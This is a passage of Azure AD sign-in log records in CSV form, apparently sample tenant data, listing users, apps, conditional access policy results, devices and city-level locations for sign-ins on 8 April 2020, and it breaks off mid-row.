'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:36,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",5423bf62-9037-4448-bcaa-3033573b0d00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,5423bf62-9037-4448-bcaa-3033573b0d00,SigninLogs,Sucess,33.0175209,35.44601059
+1043,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:52.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:36,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",5423bf62-9037-4448-bcaa-3033573b0d00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,5423bf62-9037-4448-bcaa-3033573b0d00,SigninLogs,Sucess,33.0175209,35.44601059
+1044,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,37:42.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,deccc428-3fda-4bc3-ba19-f0967fea0563,Microsoft.aadiam,Microsoft.aadiam,,Chris Boehm,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:37,"{'operatingSystem': 'Windows 10', 'deviceId': 'd6dd34c4-e1a4-4486-bd7b-115b5de752fb', 'browser': 'Edge 18.1836', 'displayName': 'CALMENTROPY', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",1a73c19f-e438-489f-aa25-86e840143f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},Chris Boehm,8c102503-0f98-4b9b-9b4a-ebb56d14c66a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,1a73c19f-e438-489f-aa25-86e840143f00,SigninLogs,Sucess,35.01296997,-80.93171692
+1045,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,44:02.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,53990547-4be7-4dae-85b8-1314b99abd65,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:44,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",7688e8c0-f176-4f1e-95a2-c1ffbd870f00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,7688e8c0-f176-4f1e-95a2-c1ffbd870f00,SigninLogs,Sucess,50.6406517,5.572050095
+1046,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:57.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b55a0d50-6667-4d0f-a3f3-ac3ba6256367,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:50,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",58101571-c323-4e3c-9694-0b1216110e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,58101571-c323-4e3c-9694-0b1216110e00,SigninLogs,Sucess,36.6404686,-78.26995087
+1047,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:57.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b55a0d50-6667-4d0f-a3f3-ac3ba6256367,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:50,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",58101571-c323-4e3c-9694-0b1216110e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,58101571-c323-4e3c-9694-0b1216110e00,SigninLogs,Sucess,36.6404686,-78.26995087
+1048,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,49:02.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,deccc428-3fda-4bc3-ba19-f0967fea0563,Microsoft.aadiam,Microsoft.aadiam,,Chris Boehm,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:49,"{'operatingSystem': 'Windows 10', 'deviceId': 'd6dd34c4-e1a4-4486-bd7b-115b5de752fb', 'browser': 'Edge 18.1836', 'displayName': 'CALMENTROPY', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",bedbb460-1ee1-4406-81dc-34b3192b4000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},Chris Boehm,8c102503-0f98-4b9b-9b4a-ebb56d14c66a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,bedbb460-1ee1-4406-81dc-34b3192b4000,SigninLogs,Sucess,35.01296997,-80.93171692
+1049,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:03.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,536dee7b-d4fc-488e-951f-b0f2892cf20d,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",37105d23-9607-4aeb-a84b-5fa3561f0f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,37105d23-9607-4aeb-a84b-5fa3561f0f00,SigninLogs,Sucess,36.6404686,-78.26995087
+1050,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:21.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,394bbbfa-32af-4cec-af63-76c2b73c929c,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 